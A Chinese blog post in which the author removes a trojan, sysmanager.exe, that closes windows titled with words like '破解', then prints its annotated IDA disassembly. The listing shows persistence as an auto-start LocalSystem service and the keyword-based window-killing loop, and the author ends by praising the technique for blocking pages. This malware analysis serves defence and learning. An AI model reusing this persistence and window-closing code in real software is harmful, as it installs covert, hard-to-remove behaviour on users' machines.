这几天不知道为啥子电脑速度特别慢,而且有些网页打开后就直接将浏览器关闭了,搞得我很郁闷.用杀毒软件查杀,结果啥都没查出来...于是很纠结,还是手动杀毒比较靠谱...因为这些网页打开的都有些破解,逆向等字眼,所以就怀疑它是根据关键字来进行工作的,于是新建了一个“逆向破解.txt”,用记事本打开,果然:一打开它就关闭了,换editplus打开,结果还是一样,而换了文件名打开就正常了.
因为对于每个进程都会产生这种情况,所以初步怀疑是dll注入,可对照两个进程的dll,除了系统的dll,貌似也没啥子问题,而注入系统dll的可能性不大,所以还是另寻他法吧。
将电脑在安全模式下打开,观察进程列表,然后电脑正常模式下打开,观察进程列表,然后再进行一个一个排除。
经过反复的测试,确定是sysmanager.exe文件的问题,关闭进程,结果能正常运行。接着百度了下该进程,果然是个病毒木马程序,然后清理注册表,删除程序,ok,杀毒完毕!!!
本来到这里都应该结束了,但是一时也没啥事干,而且这东西搞得我郁闷无比!!!所以还是决定分析下。
PEiD查壳:Microsoft Visual C++ 6.0
这是一个好消息,接着就用IDA + OD进行分析吧.
代码:
; ===========================================================================
; WinMain of sysmanager.exe (IDA listing as pasted by the author; one
; instruction per line restored, addresses and operands unchanged).
; What is visible here:
;   1. sub_401000 is called (not in the listing) and the current thread id
;      is stored in dword_403068 -- nothing in this listing reads it back;
;   2. the command line (Str1) is compared with "/uninstall" by _stricmp;
;      on a match sub_401220 (stop + delete the service) runs and WinMain
;      returns 0;
;   3. otherwise sub_401040 (copy self to the system directory, register
;      the service) runs and control goes to the SCM dispatcher with one
;      SERVICE_TABLE_ENTRY: "SystemManager" -> loc_401450.
; For removal, the author-visible path is therefore running the binary
; with the "/uninstall" argument (sub_401220 below).
; ===========================================================================
int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
.text:004014F0 _WinMain@16 proc near ; CODE XREF: start+12Fp
.text:004014F0
.text:004014F0 ServiceStartTable= SERVICE_TABLE_ENTRYA ptr -10h   ; local 2-entry table: {name, proc}, {NULL, NULL}
.text:004014F0 var_8 = dword ptr -8                               ; terminator entry .lpServiceName
.text:004014F0 var_4 = dword ptr -4                               ; terminator entry .lpServiceProc
.text:004014F0 hInstance = dword ptr 4
.text:004014F0 hPrevInstance = dword ptr 8
.text:004014F0 Str1 = dword ptr 0Ch                                ; lpCmdLine, renamed by IDA for the _stricmp call
.text:004014F0 nShowCmd = dword ptr 10h
.text:004014F0
.text:004014F0 sub esp, 10h
.text:004014F3 call sub_401000                                   ; not in the listing
.text:004014F8 call ds:GetCurrentThreadId
.text:004014FE mov dword_403068, eax                             ; main thread id saved; no reader visible in this listing
.text:00401503 xor eax, eax
.text:00401505 mov [esp+10h+var_8], eax                          ; NULL-terminate the service table
.text:00401509 mov [esp+10h+var_4], eax
.text:0040150D mov eax, [esp+10h+Str1]                           ; (author) check whether this is the uninstall command; if so, delete the service and uninstall the program
.text:00401511 push offset Str2 ; "/uninstall"
.text:00401516 push eax ; Str1
.text:00401517 mov [esp+18h+ServiceStartTable.lpServiceName], offset ServiceName ; "SystemManager"
.text:0040151F mov [esp+18h+ServiceStartTable.lpServiceProc], offset loc_401450   ; ServiceMain, see loc_401450 below
.text:00401527 call ds:_stricmp                                  ; case-insensitive compare of the whole command line
.text:0040152D add esp, 8
.text:00401530 test eax, eax
.text:00401532 jnz short loc_401541                              ; not "/uninstall" -> install + run as service
.text:00401534 call sub_401220                                   ; uninstall path
.text:00401539 xor eax, eax
.text:0040153B add esp, 10h
.text:0040153E retn 10h
.text:00401541 ; ---------------------------------------------------------------------------
.text:00401541
.text:00401541 loc_401541: ; CODE XREF: WinMain(x,x,x,x)+42j
.text:00401541 call sub_401040                                   ; copy to system dir + create "SystemManager" service
.text:00401546 lea ecx, [esp+10h+ServiceStartTable]              ; (author) use of StartServiceCtrlDispatcherA; for every new process a thread is created to do the checking
                                                                  ; NOTE(review): the listing shows one ServiceMain (loc_401450) that starts ONE worker thread (sub_401380);
                                                                  ; that worker enumerates top-level windows, not processes -- see sub_401380
.text:0040154A push ecx ; lpServiceStartTable
.text:0040154B call ds:StartServiceCtrlDispatcherA               ; blocks until the service stops; fails if not launched by the SCM
.text:00401551 xor eax, eax
.text:00401553 add esp, 10h
.text:00401556 retn 10h
.text:00401556 _WinMain@16 endp
; Layout of the table entries built above (author's reference):
typedef struct _SERVICE_TABLE_ENTRY { LPTSTR lpServiceName; LPSERVICE_MAIN_FUNCTION lpServiceProc; } SERVICE_TABLE_ENTRY,
lpServiceProc = 401450 ; (author) next function, sub_401040: copies sysmanager.exe into the system directory and creates an auto-start service
; ===========================================================================
; sub_401040 -- install / persist. (The "sub_401040 proc near" header line
; is missing from the pasted listing; the body starts at 00401040.)
; Visible behaviour: build "<system dir>\sysmanager.exe", copy the running
; image there (GetModuleFileNameA + CopyFileA, overwrite allowed), open the
; SCM and create an auto-start service "SystemManager" whose binary path is
; that copy. If CreateServiceA fails with 431h (ERROR_SERVICE_EXISTS) the
; existing service is re-opened with SERVICE_START access instead.
; The success continuation loc_40117C is NOT in the listing, so what is done
; with the service handle stored in dword_403060 afterwards (presumably
; StartServiceA) cannot be confirmed from here.
; Returns 0 on every failure path shown; ebx/esi/edi are saved/restored.
; Defender-relevant facts from this function: service name "SystemManager",
; image path = system directory + "\sysmanager.exe", start type AUTO,
; account LocalSystem (NULL lpServiceStartName), type 110h = own-process |
; interactive.
; ===========================================================================
.text:00401040 sub esp, 220h
.text:00401046 lea eax, [esp+220h+NewFileName]
.text:0040104A push ebx
.text:0040104B push esi
.text:0040104C push edi
.text:0040104D push 100h ; uSize
.text:00401052 push eax ; lpBuffer
.text:00401053 call ds:GetSystemDirectoryA                        ; NewFileName = "<system dir>"
; Inlined strcat(NewFileName, "\\sysmanager.exe") (VC6 codegen):
;   first repne scasb measures the suffix -> ecx = length incl. NUL, edi rewound to its start;
;   second repne scasb locates NewFileName's terminator (dec edi backs onto the NUL);
;   rep movsd / rep movsb then copy ebx bytes (dwords, then the 0..3 byte remainder).
.text:00401059 mov edi, offset aSysmanager_exe ; "\\sysmanager.exe"
.text:0040105E or ecx, 0FFFFFFFFh
.text:00401061 xor eax, eax
.text:00401063 lea edx, [esp+22Ch+NewFileName]
.text:00401067 repne scasb
.text:00401069 not ecx
.text:0040106B sub edi, ecx
.text:0040106D push 104h ; nSize                                  ; argument for GetModuleFileNameA below (pushed early by the compiler)
.text:00401072 mov esi, edi                                       ; esi = suffix (copy source)
.text:00401074 mov ebx, ecx                                       ; ebx = byte count to copy
.text:00401076 mov edi, edx                                       ; edi = NewFileName
.text:00401078 or ecx, 0FFFFFFFFh
.text:0040107B repne scasb
.text:0040107D mov ecx, ebx
.text:0040107F dec edi                                            ; edi -> NewFileName's NUL
.text:00401080 shr ecx, 2
.text:00401083 rep movsd
.text:00401085 mov ecx, ebx
.text:00401087 lea eax, [esp+230h+ExistingFileName]
.text:0040108E and ecx, 3
.text:00401091 push eax ; lpFilename
.text:00401092 rep movsb
.text:00401094 push 0 ; hModule                                   ; (author) get own module file name; hModule = NULL -> the running exe
.text:00401096 call ds:GetModuleFileNameA
.text:0040109C lea ecx, [esp+22Ch+NewFileName]
.text:004010A0 push 0 ; bFailIfExists                             ; FALSE: an existing copy in the system directory is overwritten
.text:004010A2 lea edx, [esp+230h+ExistingFileName]
.text:004010A9 push ecx ; lpNewFileName
.text:004010AA push edx ; lpExistingFileName                      ; (author) copy the file
.text:004010AB call ds:CopyFileA
.text:004010B1 test eax, eax
.text:004010B3 jnz short loc_4010BF
.text:004010B5 pop edi                                            ; copy failed -> return (eax == 0 from CopyFileA)
.text:004010B6 pop esi
.text:004010B7 pop ebx
.text:004010B8 add esp, 220h
.text:004010BE retn
.text:004010BF ; ---------------------------------------------------------------------------
.text:004010BF
.text:004010BF loc_4010BF: ; CODE XREF: sub_401040+73j
.text:004010BF push 0F003Fh ; dwDesiredAccess                     ; SC_MANAGER_ALL_ACCESS
.text:004010C4 push 0 ; lpDatabaseName
.text:004010C6 push 0 ; lpMachineName                             ; (author) open the service control manager (local machine)
.text:004010C8 call ds:OpenSCManagerA
.text:004010CE test eax, eax
.text:004010D0 mov hSCObject, eax                                 ; global SCM handle, also used by sub_401220
.text:004010D5 jnz short loc_4010E1
.text:004010D7 pop edi                                            ; OpenSCManagerA failed -> return 0
.text:004010D8 pop esi
.text:004010D9 pop ebx
.text:004010DA add esp, 220h
.text:004010E0 retn
.text:004010E1 ; ---------------------------------------------------------------------------
.text:004010E1
.text:004010E1 loc_4010E1: ; CODE XREF: sub_401040+95j
.text:004010E1 push 0 ; lpPassword
.text:004010E3 push 0 ; lpServiceStartName                        ; NULL account -> the service runs as LocalSystem
.text:004010E5 push offset Dependencies ; lpDependencies          ; contents of Dependencies not shown in the listing
.text:004010EA push 0 ; lpdwTagId
.text:004010EC lea ecx, [esp+23Ch+NewFileName]
.text:004010F0 push 0 ; lpLoadOrderGroup
.text:004010F2 push ecx ; lpBinaryPathName                        ; "<system dir>\sysmanager.exe" built above
.text:004010F3 mov ebx, 2
.text:004010F8 push 1 ; dwErrorControl                            ; SERVICE_ERROR_NORMAL
.text:004010FA push ebx ; dwStartType                             ; 2 = SERVICE_AUTO_START: restarts at every boot
.text:004010FB push 110h ; dwServiceType                          ; SERVICE_WIN32_OWN_PROCESS (10h) | SERVICE_INTERACTIVE_PROCESS (100h);
                                                                  ; the interactive flag is what lets the worker in sub_401380 see user windows on this era's Windows (TODO confirm on target OS)
.text:00401100 push 0F01FFh ; dwDesiredAccess                     ; SERVICE_ALL_ACCESS
.text:00401105 push offset ServiceName ; "SystemManager"          ; lpDisplayName
.text:0040110A push offset ServiceName ; "SystemManager"          ; lpServiceName
.text:0040110F push eax ; hSCManage                               ; (author) create the service   [IDA label reads "hSCManage", i.e. hSCManager]
.text:00401110 call ds:CreateServiceA
.text:00401116 mov esi, ds:GetLastError
.text:0040111C mov dword_403060, eax                              ; global service handle
.text:00401121 test eax, eax
.text:00401123 jnz short loc_40117C                               ; created -> loc_40117C (NOT in the listing)
.text:00401125 call esi ; GetLastError
.text:00401127 cmp eax, 431h                                      ; 431h = ERROR_SERVICE_EXISTS: already installed, fall back to OpenServiceA
.text:0040112C jz short loc_401147
.text:0040112E mov edx, hSCObject                                 ; other error -> close SCM and return 0
.text:00401134 push edx ; hSCObject
.text:00401135 call ds:CloseServiceHandle
.text:0040113B pop edi
.text:0040113C pop esi
.text:0040113D xor eax, eax
.text:0040113F pop ebx
.text:00401140 add esp, 220h
.text:00401146 retn
.text:00401147 ; ---------------------------------------------------------------------------
.text:00401147
.text:00401147 loc_401147: ; CODE XREF: sub_401040+ECj
.text:00401147 mov eax, hSCObject
.text:0040114C push 10h ; dwDesiredAccess                         ; SERVICE_START only: enough to (presumably) start it at loc_40117C
.text:0040114E push offset ServiceName ; "SystemManager"
.text:00401153 push eax ; hSCManager                              ; (author) open the existing service
.text:00401154 call ds:OpenServiceA
.text:0040115A test eax, eax
.text:0040115C mov dword_403060, eax
.text:00401161 jnz short loc_40117C                               ; opened -> loc_40117C (NOT in the listing)
.text:00401163 mov ecx, hSCObject                                 ; open failed -> close SCM and return 0
.text:00401169 push ecx ; hSCObject
.text:0040116A call ds:CloseServiceHandle
.text:00401170 pop edi
.text:00401171 pop esi
.text:00401172 xor eax, eax
.text:00401174 pop ebx
.text:00401175 add esp, 220h
.text:0040117B retn
; NOTE(review): loc_40117C, the success path of sub_401040, is absent from the pasted listing.
; ---------------------------------------------------------------------------
; sub_401220 -- the "/uninstall" path called from WinMain. (author) delete the service.
; Opens the SCM and the "SystemManager" service; if QueryServiceStatus reports
; dwCurrentState == 4 (SERVICE_RUNNING) it sends control 1 (SERVICE_CONTROL_STOP),
; then DeleteService and closes both handles. Returns 0 on the path shown.
; The QueryServiceStatus / ControlService results are not checked. The failure
; targets loc_4012AB and loc_4012C3 are not in the listing.
; ---------------------------------------------------------------------------
sub_401220 proc near ; CODE XREF: WinMain(x,x,x,x)+44p
.text:00401220 push esi
.text:00401221 push 0F003Fh ; dwDesiredAccess                     ; SC_MANAGER_ALL_ACCESS
.text:00401226 push 0 ; lpDatabaseName
.text:00401228 push 0 ; lpMachineName
.text:0040122A call ds:OpenSCManagerA
.text:00401230 test eax, eax
.text:00401232 mov hSCObject, eax
.text:00401237 jz loc_4012C3                                      ; not in the listing
.text:0040123D push 0F01FFh ; dwDesiredAccess                     ; SERVICE_ALL_ACCESS
.text:00401242 push offset ServiceName ; "SystemManager"
.text:00401247 push eax ; hSCManager
.text:00401248 call ds:OpenServiceA
.text:0040124E test eax, eax
.text:00401250 mov dword_403060, eax
.text:00401255 jz short loc_4012C3                                ; not in the listing
.text:00401257 push offset ServiceStatus ; lpServiceStatus
.text:0040125C push eax ; hService
.text:0040125D call ds:QueryServiceStatus                         ; return value ignored; ServiceStatus read regardless
.text:00401263 cmp ServiceStatus.dwCurrentState, 4                ; 4 = SERVICE_RUNNING
.text:0040126A jnz short loc_40127F
.text:0040126C mov eax, dword_403060
.text:00401271 push offset ServiceStatus ; lpServiceStatus
.text:00401276 push 1 ; dwControl                                 ; SERVICE_CONTROL_STOP
.text:00401278 push eax ; hService
.text:00401279 call ds:ControlService                             ; stop request; result not checked, no wait for SERVICE_STOPPED
.text:0040127F
.text:0040127F loc_40127F: ; CODE XREF: sub_401220+4Aj
.text:0040127F mov ecx, dword_403060
.text:00401285 push ecx ; hService
.text:00401286 call ds:DeleteService                              ; marks the service for deletion
.text:0040128C test eax, eax
.text:0040128E jz short loc_4012AB                                ; not in the listing
.text:00401290 mov edx, hSCObject
.text:00401296 mov esi, ds:CloseServiceHandle
.text:0040129C push edx ; hSCObject
.text:0040129D call esi ; CloseServiceHandle
.text:0040129F mov eax, dword_403060
.text:004012A4 push eax ; hSCObject                               ; IDA's label is misleading: this is the service handle (dword_403060)
.text:004012A5 call esi ; CloseServiceHandle
.text:004012A7 xor eax, eax
.text:004012A9 pop esi
.text:004012AA retn
; ---------------------------------------------------------------------------
; loc_401450 -- ServiceMain for "SystemManager" (the pasted prefix "xt:00401450"
; is ".text:00401450" with its first bytes lost). Registers sub_4012D0 as the
; control handler (sub_4012D0 is not in the listing), reports
; SERVICE_START_PENDING (2) with dwControlsAccepted = 3, then SERVICE_RUNNING
; (4), spawns ONE worker thread running sub_401380 and blocks on it with
; WaitForSingleObject(INFINITE). The thread handle is never closed on the path
; shown.
; ---------------------------------------------------------------------------
xt:00401450 loc_401450: ; DATA XREF: WinMain(x,x,x,x)+2Fo
.text:00401450 push offset sub_4012D0                             ; lpHandlerProc (not in the listing)
.text:00401455 push offset ServiceName ; "SystemManager"
.text:0040145A mov ServiceStatus.dwCurrentState, 2                ; SERVICE_START_PENDING
.text:00401464 mov ServiceStatus.dwControlsAccepted, 3            ; SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE
.text:0040146E call ds:RegisterServiceCtrlHandlerA
.text:00401474 test eax, eax
.text:00401476 mov hServiceStatus, eax
.text:0040147B jz short locret_4014E4                             ; registration failed -> return without a status report
.text:0040147D push esi
.text:0040147E mov esi, ds:SetServiceStatus
.text:00401484 push offset ServiceStatus
.text:00401489 push eax
.text:0040148A call esi ; SetServiceStatus                        ; report START_PENDING
.text:0040148C mov eax, hServiceStatus
.text:00401491 push offset ServiceStatus                          ; arguments for the second SetServiceStatus pushed before the fields are updated
.text:00401496 push eax
.text:00401497
.text:00401497 __cfltcvt_init:                                     ; IDA-assigned name, presumably a spurious library-signature match -- nothing CRT-related here; verify in the idb
.text:00401497 mov ServiceStatus.dwWin32ExitCode, 0
.text:004014A1 mov ServiceStatus.dwCheckPoint, 0
.text:004014AB mov ServiceStatus.dwWaitHint, 0
.text:004014B5 mov ServiceStatus.dwCurrentState, 4                ; SERVICE_RUNNING
.text:004014BF call esi ; SetServiceStatus
.text:004014C1 push 0                                             ; lpThreadId
.text:004014C3 push 0                                             ; dwCreationFlags
.text:004014C5 push 0                                             ; lpParameter
.text:004014C7 push offset sub_401380                             ; lpStartAddress: the window-title monitor below
.text:004014CC push 0                                             ; dwStackSize
.text:004014CE push 0                                             ; lpThreadAttributes
.text:004014D0 call ds:CreateThread
.text:004014D6 test eax, eax
.text:004014D8 pop esi
.text:004014D9 jz short locret_4014E4
.text:004014DB push 0FFFFFFFFh                                    ; dwMilliseconds = INFINITE
.text:004014DD push eax                                           ; hHandle = worker thread
.text:004014DE call ds:WaitForSingleObject                        ; ServiceMain parks here; the worker loops forever
.text:004014E4
.text:004014E4 locret_4014E4: ; CODE XREF: .text:0040147Bj
.text:004014E4 ; .text:004014D9j
.text:004014E4 retn
; (author) for every new process a thread is created; thread function address: sub_401380
; NOTE(review): the listing shows a single CreateThread per service start; the thread polls windows, not processes.
; ---------------------------------------------------------------------------
; sub_401380 -- worker thread; never returns (jmp loc_40138F at the end).
; Every 1000 ms: zero a 25-dword table at dword_403094, reset the count in
; dword_403224, call EnumWindows(EnumFunc, 0). EnumFunc is not in the listing;
; it presumably fills the table and the count -- whether it honours the
; 25-entry capacity cannot be checked here (worth confirming in the idb).
; Then, for each collected HWND: read up to 80h bytes of window title and
; _mbsstr it against three substrings -- unk_403040 (IDA did not render it as
; a string; its content is not visible here), "专用" and "破解". Any hit sends
; WM_CLOSE (Msg 10h) to that window.
; Detection angle: a "SystemManager" service (interactive, LocalSystem) that
; polls all top-level window titles once a second and closes matches.
; ---------------------------------------------------------------------------
sub_401380 proc near ; DATA XREF: .text:004014C7o
.text:00401380
.text:00401380 String = byte ptr -104h                              ; 104h-byte title buffer; GetWindowTextA is limited to 80h
.text:00401380
.text:00401380 sub esp, 104h
.text:00401386 push ebx
.text:00401387 mov ebx, ds:_mbsstr                                ; multibyte substring search (needed for the GBK keywords)
.text:0040138D push esi
.text:0040138E push edi
.text:0040138F
.text:0040138F loc_40138F: ; CODE XREF: sub_401380+47j
.text:0040138F ; sub_401380+BEj
.text:0040138F push 3E8h ; dwMilliseconds                         ; 1000 ms poll interval
.text:00401394 call ds:Sleep
.text:0040139A xor eax, eax
.text:0040139C mov ecx, 19h                                       ; 25 dwords
.text:004013A1 mov edi, offset dword_403094                       ; HWND table
.text:004013A6 push eax ; lParam                                  ; lParam = 0
.text:004013A7 rep stosd                                          ; clear the table
.text:004013A9 push offset EnumFunc ; lpEnumFunc                  ; callback not in the listing
.text:004013AE mov dword_403224, 0                                ; entry count, reset per pass
.text:004013B8 call ds:EnumWindows                                ; (author) enumerate windows
.text:004013BE mov eax, dword_403224
.text:004013C3 xor edi, edi                                       ; edi = index
.text:004013C5 test eax, eax
.text:004013C7 jle short loc_40138F                               ; nothing collected -> sleep again
.text:004013C9 mov esi, offset dword_403094                       ; esi -> current HWND slot
.text:004013CE
.text:004013CE loc_4013CE: ; CODE XREF: sub_401380+BCj
.text:004013CE mov eax, [esi]
.text:004013D0 test eax, eax
.text:004013D2 jz short loc_401431                                ; empty slot -> next
.text:004013D4 lea ecx, [esp+110h+String]
.text:004013D8 push 80h ; nMaxCount
.text:004013DD push ecx ; lpString
.text:004013DE push eax ; hWnd
.text:004013DF call ds:GetWindowTextA                             ; (author) fetch the window title
.text:004013E5 test eax, eax
.text:004013E7 jz short loc_401431                                ; no title -> next
.text:004013E9 lea edx, [esp+110h+String]
.text:004013ED push offset unk_403040                             ; keyword #1 (not rendered as a string by IDA)
.text:004013F2 push edx
.text:004013F3 call ebx ; _mbsstr
.text:004013F5 add esp, 8
.text:004013F8 test eax, eax
.text:004013FA jnz short loc_401422
.text:004013FC lea eax, [esp+110h+String]
.text:00401400 push offset aI ; "专用"                            ; keyword #2
.text:00401405 push eax
.text:00401406 call ebx ; _mbsstr                                 ; (author) keyword check: 专用
.text:00401408 add esp, 8
.text:0040140B test eax, eax
.text:0040140D jnz short loc_401422
.text:0040140F lea ecx, [esp+110h+String]
.text:00401413 push offset aT ; "破解"                            ; keyword #3
.text:00401418 push ecx
.text:00401419 call ebx ; _mbsstr                                 ; (author) keyword check: 破解
.text:0040141B add esp, 8
.text:0040141E test eax, eax
.text:00401420 jz short loc_401431                                ; no keyword -> next window
.text:00401422
.text:00401422 loc_401422: ; CODE XREF: sub_401380+7Aj
.text:00401422 ; sub_401380+8Dj
.text:00401422 mov edx, [esi]
.text:00401424 push 0 ; lParam
.text:00401426 push 0 ; wParam
.text:00401428 push 10h ; Msg                                     ; 10h = WM_CLOSE
.text:0040142A push edx ; hWnd
.text:0040142B call ds:SendMessageA                               ; (author) send a message to close the process
                                                                  ; NOTE(review): WM_CLOSE asks the top-level window to close; whether the process exits depends on the
                                                                  ; target's handler -- consistent with the author's symptom of Notepad/EditPlus windows closing
.text:00401431
.text:00401431 loc_401431: ; CODE XREF: sub_401380+52j
.text:00401431 ; sub_401380+67j ...
.text:00401431 mov eax, dword_403224
.text:00401436 inc edi
.text:00401437 add esi, 4
.text:0040143A cmp edi, eax
.text:0040143C jl short loc_4013CE
.text:0040143E jmp loc_40138F                                     ; loop forever; no exit condition
.text:0040143E sub_401380 endp
到这里就分析完毕了,终于知道啥原因了,同时也学了个函数StartServiceCtrlDispatcherA,这是一个好函数,用来做文件监控真是再好不过了,而且可以对一些关键字进行过滤,比如:把有关破解逆向的网页全部都屏蔽掉.好东西,学习了.
